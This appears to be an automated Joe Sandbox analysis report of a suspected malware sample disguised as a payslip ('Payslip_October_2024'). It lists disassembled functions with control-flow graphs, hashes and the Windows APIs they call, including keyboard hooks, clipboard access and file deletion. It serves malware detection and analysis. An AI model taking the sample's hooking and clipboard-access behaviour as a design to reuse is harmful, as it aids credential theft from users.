                                                                                                            control_flow_graph 1866 4fb1dc0-4fb1de8 1868 4fb1dee-4fb1e18 1866->1868 1869 4fb20e6-4fb20f0 1866->1869 1872 4fb1e1a-4fb1e1c 1868->1872 1873 4fb1e24-4fb1e27 1868->1873 1874 4fb1e22 1872->1874 1875 4fb20f1 1872->1875 1873->1875 1876 4fb1e2d-4fb1e45 1873->1876 1874->1876 1878 4fb20f6-4fb2127 1875->1878 1881 4fb1e4d-4fb1e6c 1876->1881 1881->1878 1884 4fb1e72-4fb1fd0 1881->1884 1899 4fb20d7-4fb20e0 1884->1899 1900 4fb1fd6-4fb1fdf 1884->1900 1899->1868 1899->1869 1901 4fb1fe3-4fb2046 1900->1901 1906 4fb2048-4fb204a 1901->1906 1907 4fb2052-4fb2055 1901->1907 1906->1875 1908 4fb2050 1906->1908 1907->1875 1909 4fb205b-4fb206d 1907->1909 1908->1909 1909->1878 1910 4fb2073-4fb209d 1909->1910 1912 4fb209f-4fb20a1 1910->1912 1913 4fb20a5-4fb20a8 1910->1913 1912->1875 1914 4fb20a3 1912->1914 1913->1875 1915 4fb20aa-4fb20bc 1913->1915 1914->1915 1915->1878 1916 4fb20be-4fb20d1 1915->1916 1916->1899 1916->1901
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4141227634.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_4fb0000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: nKvq$nKvq
                                                                                                            • API String ID: 0-2223595353
                                                                                                            • Opcode ID: 51c3ccc7af51f89f821701d862773a44e2a52bd1dbdcbe5ffbbe6edf49f6ed18
                                                                                                            • Instruction ID: 3cbdd02aed7ca669d41ff2e366eaccb0c7e7817244f94a3d52ac4ecc2bd2f08a
                                                                                                            • Opcode Fuzzy Hash: 51c3ccc7af51f89f821701d862773a44e2a52bd1dbdcbe5ffbbe6edf49f6ed18
                                                                                                            • Instruction Fuzzy Hash: B6B13B75E006068FCB18DF68C4909AEF7B2BF88310B168695E9556B356DB30FD82CBD1
                                                                                                            Function 04FB1DB0 Relevance: 2.8, Strings: 2, Instructions: 252COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1918 4fb1db0-4fb1de8 1921 4fb1dee-4fb1e18 1918->1921 1922 4fb20e6-4fb20f0 1918->1922 1925 4fb1e1a-4fb1e1c 1921->1925 1926 4fb1e24-4fb1e27 1921->1926 1927 4fb1e22 1925->1927 1928 4fb20f1 1925->1928 1926->1928 1929 4fb1e2d-4fb1e45 1926->1929 1927->1929 1931 4fb20f6-4fb2127 1928->1931 1934 4fb1e4d-4fb1e6c 1929->1934 1934->1931 1937 4fb1e72-4fb1fd0 1934->1937 1952 4fb20d7-4fb20e0 1937->1952 1953 4fb1fd6-4fb1fdf 1937->1953 1952->1921 1952->1922 1954 4fb1fe3-4fb2046 1953->1954 1959 4fb2048-4fb204a 1954->1959 1960 4fb2052-4fb2055 1954->1960 1959->1928 1961 4fb2050 1959->1961 1960->1928 1962 4fb205b-4fb206d 1960->1962 1961->1962 1962->1931 1963 4fb2073-4fb209d 1962->1963 1965 4fb209f-4fb20a1 1963->1965 1966 4fb20a5-4fb20a8 1963->1966 1965->1928 1967 4fb20a3 1965->1967 1966->1928 1968 4fb20aa-4fb20bc 1966->1968 1967->1968 1968->1931 1969 4fb20be-4fb20d1 1968->1969 1969->1952 1969->1954
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4141227634.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_4fb0000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: nKvq$nKvq
                                                                                                            • API String ID: 0-2223595353
                                                                                                            • Opcode ID: c093488610f904467c3ed958fbf7b41de8488ff6be5dc48fe39450242ec6b7f2
                                                                                                            • Instruction ID: 37c0f1450fac7145a6540ca3799ccd6d10a659f3dfa5e946f0f3949068a91cf1
                                                                                                            • Opcode Fuzzy Hash: c093488610f904467c3ed958fbf7b41de8488ff6be5dc48fe39450242ec6b7f2
                                                                                                            • Instruction Fuzzy Hash: 58B12975E006068FCB08DF58C4909AEF7B2BF88310B168695E945AB356DB30FD82CBD1
                                                                                                            Function 06629252 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1971 6629252-6629285 1973 6629287-662928a 1971->1973 1974 66292b0-66292b3 1973->1974 1975 662928c-66292ab 1973->1975 1976 6629b73-6629b75 1974->1976 1977 66292b9-66292ce 1974->1977 1975->1974 1978 6629b77 1976->1978 1979 6629b7c-6629b7f 1976->1979 1983 66292d0-66292d6 1977->1983 1984 66292e6-66292fc 1977->1984 1978->1979 1979->1973 1982 6629b85-6629b8f 1979->1982 1986 66292da-66292dc 1983->1986 1987 66292d8 1983->1987 1989 6629307-6629309 1984->1989 1986->1984 1987->1984 1990 6629321-6629392 1989->1990 1991 662930b-6629311 1989->1991 2002 6629394-66293b7 1990->2002 2003 66293be-66293da 1990->2003 1992 6629313 1991->1992 1993 6629315-6629317 1991->1993 1992->1990 1993->1990 2002->2003 2008 6629406-6629421 2003->2008 2009 66293dc-66293ff 2003->2009 2014 6629423-6629445 2008->2014 2015 662944c-6629467 2008->2015 2009->2008 2014->2015 2020 6629492-662949c 2015->2020 2021 6629469-662948b 2015->2021 2022 662949e-66294a7 2020->2022 2023 66294ac-6629526 2020->2023 2021->2020 2022->1982 2029 6629573-6629588 2023->2029 2030 6629528-6629546 2023->2030 2029->1976 2034 6629562-6629571 2030->2034 2035 6629548-6629557 2030->2035 2034->2029 2034->2030 2035->2034
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4144459823.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $^q$$^q
                                                                                                            • API String ID: 0-355816377
                                                                                                            • Opcode ID: e240674a131bfb5244c0eb2015ea5a2ecdf4e0037fbc65bb5ee2988526e57f81
                                                                                                            • Instruction ID: 2f3604ff0134d45aeea4c97e7419bdb99f1509ba504a8ef30a34ac371140928f
                                                                                                            • Opcode Fuzzy Hash: e240674a131bfb5244c0eb2015ea5a2ecdf4e0037fbc65bb5ee2988526e57f81
                                                                                                            • Instruction Fuzzy Hash: A1515070B101169FDB54EB79D990B6EB3F6AFC8304F14856AD40ADB388EA30DC428F95
                                                                                                            Function 06624C69 Relevance: 2.6, Strings: 2, Instructions: 140COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 2038 6624c69-6624c9c 2040 6624c9e-6624ca1 2038->2040 2041 6624cc2-6624cc5 2040->2041 2042 6624ca3-6624cbd 2040->2042 2043 66253a4-66253a6 2041->2043 2044 6624ccb-6624dc3 2041->2044 2042->2041 2046 66253a8 2043->2046 2047 66253ad-66253b0 2043->2047 2062 6624e46-6624e4d 2044->2062 2063 6624dc9-6624e16 call 6625522 2044->2063 2046->2047 2047->2040 2048 66253b6-66253c3 2047->2048 2064 6624e53-6624ec3 2062->2064 2065 6624ed1-6624eda 2062->2065 2076 6624e1c-6624e38 2063->2076 2082 6624ec5 2064->2082 2083 6624ece 2064->2083 2065->2048 2079 6624e43-6624e44 2076->2079 2080 6624e3a 2076->2080 2079->2062 2080->2079 2082->2083 2083->2065
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4144459823.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: fcq$XPcq
                                                                                                            • API String ID: 0-936005338
                                                                                                            • Opcode ID: 7aa56577ddf054e14fea172baf68ee16851c08f6173071f08e25569c379df6f1
                                                                                                            • Instruction ID: baae05744e288fc0df4931bd74bbd0824964f1bf3d5a9f378011a8367a77848d
                                                                                                            • Opcode Fuzzy Hash: 7aa56577ddf054e14fea172baf68ee16851c08f6173071f08e25569c379df6f1
                                                                                                            • Instruction Fuzzy Hash: DF518D70F002199FEB45DFA9C8557AEBBF6EF88700F20842AE145AB395DE748C018B91
                                                                                                            Function 00C7EE90 Relevance: 1.6, APIs: 1, Instructions: 132COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4120922070.0000000000C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C70000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_c70000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: ad3f07c3985b851aadd959dabf37131280d0ed1cb0add8098a59006d1c43581c
                                                                                                            • Instruction ID: 9e119230dc11c93bc9e1e17107ffe60e1850e36a30b3cf7bcd45a38e9b62a430
                                                                                                            • Opcode Fuzzy Hash: ad3f07c3985b851aadd959dabf37131280d0ed1cb0add8098a59006d1c43581c
                                                                                                            • Instruction Fuzzy Hash: 41413672D003558FCB00CFB9D80879EBBF1EF89310F0586AAD418A7791DB789945CB90
                                                                                                            Function 05625FD3 Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 056260EA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4142395831.0000000005620000.00000040.00000800.00020000.00000000.sdmp, Offset: 05620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_5620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 716092398-0
                                                                                                            • Opcode ID: 7212e7b8f6a62eb3d129ce5bc02aefd19481495d9dd14d541b19984c40f937df
                                                                                                            • Instruction ID: 56956aa199655db5099c3d90c8de96bf8f70b256fd0a49c35a38b8e137e290f3
                                                                                                            • Opcode Fuzzy Hash: 7212e7b8f6a62eb3d129ce5bc02aefd19481495d9dd14d541b19984c40f937df
                                                                                                            • Instruction Fuzzy Hash: F451BFB1D00319DFDF14CF9AC984ADEBBB5BF48314F24812AE419AB210DB75A945CF91
                                                                                                            Function 05625FD8 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 056260EA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4142395831.0000000005620000.00000040.00000800.00020000.00000000.sdmp, Offset: 05620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_5620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 716092398-0
                                                                                                            • Opcode ID: ff7d78d8af9de0694a165e8b19060c363b867abe9060db461cc86c99827e2776
                                                                                                            • Instruction ID: ddeeeb3a80c7d09b5c04350187fb09a778eb44e18cd7ed03b7f8ffd0d3e99858
                                                                                                            • Opcode Fuzzy Hash: ff7d78d8af9de0694a165e8b19060c363b867abe9060db461cc86c99827e2776
                                                                                                            • Instruction Fuzzy Hash: C741AEB1D00319DFDF14CF9AC984ADEBBB5BF48314F24812AE819AB210D775A945CF91
                                                                                                            Function 05629AB4 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 0562AE29
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4142395831.0000000005620000.00000040.00000800.00020000.00000000.sdmp, Offset: 05620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_5620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CallProcWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 2714655100-0
                                                                                                            • Opcode ID: ac80c876505c434266381bdd5346ea9a06c710cb77d59b2d2972099e3fdc527e
                                                                                                            • Instruction ID: 77537b39b82d97e8fac40d8b81019615f57691461531d7238f7ef7db868c1dfa
                                                                                                            • Opcode Fuzzy Hash: ac80c876505c434266381bdd5346ea9a06c710cb77d59b2d2972099e3fdc527e
                                                                                                            • Instruction Fuzzy Hash: 9D413DB4900719CFCB14CF99C888AAABBF6FF88314F14C459D559AB321D7B4A945CFA0
                                                                                                            Function 0562B4D0 Relevance: 1.6, APIs: 1, Instructions: 74comclipboardCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4142395831.0000000005620000.00000040.00000800.00020000.00000000.sdmp, Offset: 05620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_5620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Clipboard
                                                                                                            • String ID:
                                                                                                            • API String ID: 220874293-0
                                                                                                            • Opcode ID: 70a42a12285f2af2dedb7e6d6b18593c454c52c7e197f4a895adc6eac513f495
                                                                                                            • Instruction ID: cfd18f0a0f6b87070346e2e61cfac2bfd43233f54ccc779da9a699fd26794f5a
                                                                                                            • Opcode Fuzzy Hash: 70a42a12285f2af2dedb7e6d6b18593c454c52c7e197f4a895adc6eac513f495
                                                                                                            • Instruction Fuzzy Hash: A231F0B0D01618DFDB10DF99C989B8EBBF5EB48304F248019E405AB3A4DB75A945CF55
                                                                                                            Function 0562BAB2 Relevance: 1.6, APIs: 1, Instructions: 70comclipboardCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4142395831.0000000005620000.00000040.00000800.00020000.00000000.sdmp, Offset: 05620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_5620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Clipboard
                                                                                                            • String ID:
                                                                                                            • API String ID: 220874293-0
                                                                                                            • Opcode ID: a7593a5b314ab984402552f37b52fcf1fb4a15e99d1360fa7b2ae37b0d84abd0
                                                                                                            • Instruction ID: 9352748d8ffa840f7541c6775acab97a1c6de8adf5b8c0e9a92823a0632631b6
                                                                                                            • Opcode Fuzzy Hash: a7593a5b314ab984402552f37b52fcf1fb4a15e99d1360fa7b2ae37b0d84abd0
                                                                                                            • Instruction Fuzzy Hash: 0B31EDB0D01618DFDB14DF99C989BDEBBF1EB48304F248019E409AB2A4DB74A945CF65
                                                                                                            Function 05629ED0 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 05629F5F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4142395831.0000000005620000.00000040.00000800.00020000.00000000.sdmp, Offset: 05620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_5620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DuplicateHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 3793708945-0
                                                                                                            • Opcode ID: 8a55b920158124769f0208bce760c5bb7256c5fc085c926b2ecf823f0813abd4
                                                                                                            • Instruction ID: af93eeda6fb352f4efbdbb9a94bc08c6e236ea9d6e024f98df5cb218b25406ee
                                                                                                            • Opcode Fuzzy Hash: 8a55b920158124769f0208bce760c5bb7256c5fc085c926b2ecf823f0813abd4
                                                                                                            • Instruction Fuzzy Hash: 0E21C3B5904249AFDB10CFAAD984ADEBBF4EB48310F14801AE959A3350D374A954CF65
                                                                                                            Function 05629ED8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 05629F5F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4142395831.0000000005620000.00000040.00000800.00020000.00000000.sdmp, Offset: 05620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_5620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DuplicateHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 3793708945-0
                                                                                                            • Opcode ID: 2e22a788ea8bb5ba9c08ef15161db94c36b9e0aaa974e68d6679ccdccce6b822
                                                                                                            • Instruction ID: 3b2e604e719cf465cf260139d5717bcb6d64877bd620a18e14f90cb7fe447656
                                                                                                            • Opcode Fuzzy Hash: 2e22a788ea8bb5ba9c08ef15161db94c36b9e0aaa974e68d6679ccdccce6b822
                                                                                                            • Instruction Fuzzy Hash: 6421E4B59003089FDB10CFAAD984ADEBFF8FB48310F14801AE918A3350D374A944CF64
                                                                                                            Function 00C78038 Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • DeleteFileW.KERNEL32(00000000), ref: 00C780B0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4120922070.0000000000C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C70000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_c70000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DeleteFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 4033686569-0
                                                                                                            • Opcode ID: fd0bc4d1ad21962edbe3ecf0128bea839bf5ea1ccc8e9295e02e739d43a5349f
                                                                                                            • Instruction ID: f4c3b0b70a6a621f7ed059cc79ca78933b2056fbf839c325df0f5182d30885d7
                                                                                                            • Opcode Fuzzy Hash: fd0bc4d1ad21962edbe3ecf0128bea839bf5ea1ccc8e9295e02e739d43a5349f
                                                                                                            • Instruction Fuzzy Hash: ED2138B1C006598FCB10DFAAC445A9EFBB0AB48310F15811AD458A7340D774A948CFA1
                                                                                                            Function 0562D5F0 Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 0562D66B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4142395831.0000000005620000.00000040.00000800.00020000.00000000.sdmp, Offset: 05620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_5620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HookWindows
                                                                                                            • String ID:
                                                                                                            • API String ID: 2559412058-0
                                                                                                            • Opcode ID: ad3215ecb48c8b5bb5026aff5271d4406f56ff622382d30f1f404ce8b2bcd461
                                                                                                            • Instruction ID: 06120768b402c1006c3ed6748b81d9e35c628bdaad63b7dd8291b951269fbb75
                                                                                                            • Opcode Fuzzy Hash: ad3215ecb48c8b5bb5026aff5271d4406f56ff622382d30f1f404ce8b2bcd461
                                                                                                            • Instruction Fuzzy Hash: D52113B19042198FCB14DF9AC844BEEFBF5FB88310F10842AD419A7390C774A945CFA5
                                                                                                            Function 0562D5E8 Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 0562D66B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4142395831.0000000005620000.00000040.00000800.00020000.00000000.sdmp, Offset: 05620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_5620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HookWindows
                                                                                                            • String ID:
                                                                                                            • API String ID: 2559412058-0
                                                                                                            • Opcode ID: f958d86a7f8033fb1536e53490db036a5175d48fe4c6d3a7639cd46a42edf8be
                                                                                                            • Instruction ID: 1691cd1f20f0e7aa6bfcf845a6678c90cce630bb6d7f18c8e5c48f43425d60a2
                                                                                                            • Opcode Fuzzy Hash: f958d86a7f8033fb1536e53490db036a5175d48fe4c6d3a7639cd46a42edf8be
                                                                                                            • Instruction Fuzzy Hash: 6B2133B5D002098FCB14DF99C984BEEFBF5BB88310F10841AD419A7390C774AA85CFA1
                                                                                                            Function 00C78040 Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • DeleteFileW.KERNEL32(00000000), ref: 00C780B0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4120922070.0000000000C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C70000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_c70000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DeleteFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 4033686569-0
                                                                                                            • Opcode ID: a81e174ff644373364e453492de73d7c73dd9960055c0d76af584ec578be6f1c
                                                                                                            • Instruction ID: a7826aa0efccba2b226faf0a19beb58928cff41c26b9e5774caaeaa189842875
                                                                                                            • Opcode Fuzzy Hash: a81e174ff644373364e453492de73d7c73dd9960055c0d76af584ec578be6f1c
                                                                                                            • Instruction Fuzzy Hash: EF1108B1C006599BCB14DF9AC54579EFBF4FB48320F15811AD918A7340D778AA48CFA5
                                                                                                            Function 00C7EF78 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GlobalMemoryStatusEx.KERNEL32 ref: 00C7EFDF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4120922070.0000000000C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C70000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_c70000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: GlobalMemoryStatus
                                                                                                            • String ID:
                                                                                                            • API String ID: 1890195054-0
                                                                                                            • Opcode ID: b33c16892febb565ee06e186c05d0f6f7da56b61808653b1ed68c94afec4e256
                                                                                                            • Instruction ID: 25880b7aa181f4c967974d0698fa363e5d848f1b4f0dfef90f392d76aa5681a8
                                                                                                            • Opcode Fuzzy Hash: b33c16892febb565ee06e186c05d0f6f7da56b61808653b1ed68c94afec4e256
                                                                                                            • Instruction Fuzzy Hash: B51123B1C006599FCB10DF9AC444BDEFBF4EF48320F15816AE818A7240D778AA44CFA5
                                                                                                            Function 0562B3B4 Relevance: 1.5, APIs: 1, Instructions: 47comCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • OleInitialize.OLE32(00000000), ref: 0562B9BD
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4142395831.0000000005620000.00000040.00000800.00020000.00000000.sdmp, Offset: 05620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_5620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Initialize
                                                                                                            • String ID:
                                                                                                            • API String ID: 2538663250-0
                                                                                                            • Opcode ID: 1ccb164f2ddd8e058382f5b6b5de4b771d546f2306a308b053d0781dc10ea799
                                                                                                            • Instruction ID: 1f7585e4c19c89aff1e2943b69a9201782cfe6abdf4b26643e31fdd3529ea18b
                                                                                                            • Opcode Fuzzy Hash: 1ccb164f2ddd8e058382f5b6b5de4b771d546f2306a308b053d0781dc10ea799
                                                                                                            • Instruction Fuzzy Hash: BF1142B1C047498FCB10EF9AD489BDEBBF4EB48320F20841AD559A7710D378A944CFA5
                                                                                                            Function 0562B3B8 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • OleInitialize.OLE32(00000000), ref: 0562B9BD
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4142395831.0000000005620000.00000040.00000800.00020000.00000000.sdmp, Offset: 05620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_5620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Initialize
                                                                                                            • String ID:
                                                                                                            • API String ID: 2538663250-0
                                                                                                            • Opcode ID: 373a6ec6b47c4ab1178db49745d50deb42f07c1de0b6a99149bc93ff2a823475
                                                                                                            • Instruction ID: 542702863e7ddeb797e6576c06f31c4e19f402cf9a4260ed91f67ad55c3fc958
                                                                                                            • Opcode Fuzzy Hash: 373a6ec6b47c4ab1178db49745d50deb42f07c1de0b6a99149bc93ff2a823475
                                                                                                            • Instruction Fuzzy Hash: 591115B1C04749CFCB20DF9AD449B9EBBF4EB49324F14845AD519A7310D374A944CFA5
                                                                                                            Function 05629B0C Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,0562B075), ref: 0562B0FF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4142395831.0000000005620000.00000040.00000800.00020000.00000000.sdmp, Offset: 05620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_5620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CallbackDispatcherUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 2492992576-0
                                                                                                            • Opcode ID: de30948ec548933388dee98569c8b68c56ce4b5908f7471b160074e86d78d27d
                                                                                                            • Instruction ID: c5b27f8217f3beff70dc618583b7a3c2854d0c6d328b1265215048617b107d1f
                                                                                                            • Opcode Fuzzy Hash: de30948ec548933388dee98569c8b68c56ce4b5908f7471b160074e86d78d27d
                                                                                                            • Instruction Fuzzy Hash: BA1133B08007488FCB20DF9AD489B9EBBF4EB48324F20841AD919A3350D778A944CFA5
                                                                                                            Function 0562B961 Relevance: 1.5, APIs: 1, Instructions: 44comCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • OleInitialize.OLE32(00000000), ref: 0562B9BD
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4142395831.0000000005620000.00000040.00000800.00020000.00000000.sdmp, Offset: 05620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_5620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Initialize
                                                                                                            • String ID:
                                                                                                            • API String ID: 2538663250-0
                                                                                                            • Opcode ID: a3b45ed540b3067661904792739b7ae6b362e9779d9cf437e2becf8c62afc39e
                                                                                                            • Instruction ID: 2b1f34d2aa6b4239f9ed5b10ca2304fca63298c430a4da61e39f0c60c468acb8
                                                                                                            • Opcode Fuzzy Hash: a3b45ed540b3067661904792739b7ae6b362e9779d9cf437e2becf8c62afc39e
                                                                                                            • Instruction Fuzzy Hash: A41112B58043488FCB10EFAAD589BCEBFF4EB48324F24845AD559A7350C379A944CFA5
                                                                                                            Function 0662DBDD Relevance: 1.4, Strings: 1, Instructions: 125COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4144459823.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: PH^q
                                                                                                            • API String ID: 0-2549759414
                                                                                                            • Opcode ID: b6f2f2179a3eb48ec6762a08562986c98b506a083e9de30c00614a55a2bdadd7
                                                                                                            • Instruction ID: 04089664cc0bac5079a13870287759dc3964eadae8d746cfa08721a10ae602c0
                                                                                                            • Opcode Fuzzy Hash: b6f2f2179a3eb48ec6762a08562986c98b506a083e9de30c00614a55a2bdadd7
                                                                                                            • Instruction Fuzzy Hash: 8941B170E1071A9FDB51DF64C8546AEBBB6AF85700F24492AE405EB350EF70D946CF81
                                                                                                            Function 066221BD Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
